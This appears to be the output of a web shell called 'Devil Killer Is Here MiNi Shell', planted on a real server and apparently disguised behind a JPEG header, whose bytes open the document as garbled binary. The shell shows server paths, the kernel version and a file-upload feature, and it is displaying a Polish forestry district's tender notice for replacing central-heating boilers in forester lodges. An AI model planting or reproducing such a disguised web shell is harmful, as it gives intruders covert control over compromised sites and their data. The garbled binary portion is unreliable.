JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250918/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250918/0042899101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ,,Wymiana kotłów c.o. w budynkach zarządzanych przez Nadleśnictwo Dąbrowa Tarnowska - postępowanie II&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Dąbrowa Tarnowska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350545553</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szarwarska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dąbrowa Tarnowska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dabrowatar@krakow.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dabrowa.krakow.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ,,Wymiana kotłów c.o. w budynkach zarządzanych przez Nadleśnictwo Dąbrowa Tarnowska - postępowanie II&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-50521938-a6cd-4259-a032-216308511bd4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00428991</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00238345/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa i montaż nowych kotłów w 8 obiektach Nadleśnictwa Dąbrowa Tarnowska</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1177713 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>platformy https://platformazakupowa.pl/pn/lasy_dabrowa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy https://platformazakupowa.pl/strona/1-<br/>regulamin, tj:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 256 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych -MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest<br/>Nadleśnictwo Dąbrowa Tarnowska. Administrator z którym w sprawach dotyczących przetwarzania danych osobowych można<br/>skontaktować się telefonicznie pod numerem 668 489 563 lub za pośrednictwem poczty elektronicznej na adres:<br/>udodo@lasy.gov.pl.2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. 3. Zamawiający udostępnia dane<br/>osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale<br/>VI PZP, do upływu terminu do ich wniesienia. 4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być<br/>dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do<br/>zachowania ich w poufności 5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie<br/>ziszczą się przesłanki określone w art. 93 ust. 1 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji,<br/>a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.6. Odbiorcami danych osobowych będą osoby<br/>lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o art. 8-8a oraz 96 ust. 3-3b PZP.7. Dane<br/>osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 97 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.22.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1: Leśniczówka Dulcza ⎯ Przebudowa technologii kotłowni centralnego ogrzewania w budynku mieszkalnym jednorodzinnym, leśniczówce zlokalizowanej w miejscowości Radgoszcz, Adres: ul. Szczucińska 97, 33-207 Radgoszcz<br/>Nr inwentarzowy: 110/72 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39715200-9 - Urządzenia grzewcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.1. Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami oceny<br/>ofert:<br/>Nr kryt. 1<br/>Kryterium: Cena brutto<br/>Waga kryterium: 60%<br/>Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium: 60<br/>Nr kryt. 2<br/>Kryterium: Okres gwarancji<br/>Waga kryterium: 40%<br/>Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium: 40<br/>Najkorzystniejsza oferta w odniesieniu do tych kryteriów może uzyskać maksymalnie 100 pkt.<br/>14.1. Sposób obliczania punktów za kryteria:<br/>Kryterium: cena brutto<br/>Liczba punktów = Cn/Cb x 60 gdzie:<br/>- Cn – najniższa cena spośród wszystkich ofert nie odrzuconych<br/>- Cb – cena oferty badanej<br/>-60 wskaźnik stały<br/>Kryterium: okres gwarancji<br/>Okres wydłużonego okresu udzielonej gwarancji jakości na wykonanie przedmiotu zamówienia<br/>Za udzielenie gwarancji jakości na okres:<br/>poniżej 24 miesięcy, oferta zostanie odrzucona,<br/>24 miesięcy, Wykonawca otrzyma – 0 pkt<br/>36 miesięcy, Wykonawca otrzyma – 20 pkt<br/>48 miesięcy i więcej, Wykonawca otrzyma – 40 pkt.<br/>Informację należy wskazać w formularzu ofertowym<br/>(Zał. nr 1 do SWZ).<br/>Brak deklaracji Wykonawcy w tym kryterium na Zał. nr 1 zostanie potraktowany jako<br/>nieudzielenie gwarancji i oferta tego Wykonawcy zostanie odrzucona<br/>14.2. Przy uwzględnieniu powyższych kryteriów i ich wag Wykonawca może otrzymać<br/>maksymalnie 100 pkt. Dla każdej oferty wynik oceny łącznej zostanie obliczony jako suma<br/>punktów przyznanych w powyższych kryteriach.<br/>14.3. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>14.4. Za najkorzystniejszą ofertę uznana zostanie oferta Wykonawcy, która spełnia wszystkie<br/>wymagania określone w SWZ i uzyska największą liczbę punktów.<br/>14.5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród<br/>tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>14.6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień<br/>dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub<br/>oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym<br/>przez Zamawiającego.<br/>14.7. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 14.5. SWZ,<br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: Leśniczówka Waryś:<br/>Przebudowa technologii kotłowni centralnego ogrzewania w budynku mieszkalnym jednorodzinnym, leśniczówce zlokalizowanej w miejscowości Waryś.<br/>Adres: Waryś 294A, 32-825 Borzęcin<br/>Nr inwentarzowy: 110/54 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39715200-9 - Urządzenia grzewcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.1. Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami oceny<br/>ofert:<br/>Nr kryt. 1<br/>Kryterium: Cena brutto<br/>Waga kryterium: 60%<br/>Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium: 60<br/>Nr kryt. 2<br/>Kryterium: Okres gwarancji<br/>Waga kryterium: 40%<br/>Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium: 40<br/>Najkorzystniejsza oferta w odniesieniu do tych kryteriów może uzyskać maksymalnie 100 pkt.<br/>14.1. Sposób obliczania punktów za kryteria:<br/>Kryterium: cena brutto<br/>Liczba punktów = Cn/Cb x 60 gdzie:<br/>- Cn – najniższa cena spośród wszystkich ofert nie odrzuconych<br/>- Cb – cena oferty badanej<br/>-60 wskaźnik stały<br/>Kryterium: okres gwarancji<br/>Okres wydłużonego okresu udzielonej gwarancji jakości na wykonanie przedmiotu zamówienia<br/>Za udzielenie gwarancji jakości na okres:<br/>poniżej 24 miesięcy, oferta zostanie odrzucona,<br/>24 miesięcy, Wykonawca otrzyma – 0 pkt<br/>36 miesięcy, Wykonawca otrzyma – 20 pkt<br/>48 miesięcy i więcej, Wykonawca otrzyma – 40 pkt.<br/>Informację należy wskazać w formularzu ofertowym<br/>(Zał. nr 1 do SWZ).<br/>Brak deklaracji Wykonawcy w tym kryterium na Zał. nr 1 zostanie potraktowany jako<br/>nieudzielenie gwarancji i oferta tego Wykonawcy zostanie odrzucona<br/>14.2. Przy uwzględnieniu powyższych kryteriów i ich wag Wykonawca może otrzymać<br/>maksymalnie 100 pkt. Dla każdej oferty wynik oceny łącznej zostanie obliczony jako suma<br/>punktów przyznanych w powyższych kryteriach.<br/>14.3. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>14.4. Za najkorzystniejszą ofertę uznana zostanie oferta Wykonawcy, która spełnia wszystkie<br/>wymagania określone w SWZ i uzyska największą liczbę punktów.<br/>14.5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród<br/>tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>14.6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień<br/>dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub<br/>oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym<br/>przez Zamawiającego.<br/>14.7. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 14.5. SWZ,<br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3: Leśniczówka Strzelce Wielkie:<br/>Przebudowa technologii kotłowni centralnego ogrzewania w budynku mieszkalnym jednorodzinnym, leśniczówce zlokalizowanej w miejscowości Strzelce Wielkie. <br/>Adres: Strzelce Wielkie 106A, 33-822 Strzelce Wielkie<br/>Nr inwentarzowy: 110/63, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39715200-9 - Urządzenia grzewcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.1. Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami oceny<br/>ofert:<br/>Nr kryt. 1<br/>Kryterium: Cena brutto<br/>Waga kryterium: 60%<br/>Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium: 60<br/>Nr kryt. 2<br/>Kryterium: Okres gwarancji<br/>Waga kryterium: 40%<br/>Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium: 40<br/>Najkorzystniejsza oferta w odniesieniu do tych kryteriów może uzyskać maksymalnie 100 pkt.<br/>14.1. Sposób obliczania punktów za kryteria:<br/>Kryterium: cena brutto<br/>Liczba punktów = Cn/Cb x 60 gdzie:<br/>- Cn – najniższa cena spośród wszystkich ofert nie odrzuconych<br/>- Cb – cena oferty badanej<br/>-60 wskaźnik stały<br/>Kryterium: okres gwarancji<br/>Okres wydłużonego okresu udzielonej gwarancji jakości na wykonanie przedmiotu zamówienia<br/>Za udzielenie gwarancji jakości na okres:<br/>poniżej 24 miesięcy, oferta zostanie odrzucona,<br/>24 miesięcy, Wykonawca otrzyma – 0 pkt<br/>36 miesięcy, Wykonawca otrzyma – 20 pkt<br/>48 miesięcy i więcej, Wykonawca otrzyma – 40 pkt.<br/>Informację należy wskazać w formularzu ofertowym<br/>(Zał. nr 1 do SWZ).<br/>Brak deklaracji Wykonawcy w tym kryterium na Zał. nr 1 zostanie potraktowany jako<br/>nieudzielenie gwarancji i oferta tego Wykonawcy zostanie odrzucona<br/>14.2. Przy uwzględnieniu powyższych kryteriów i ich wag 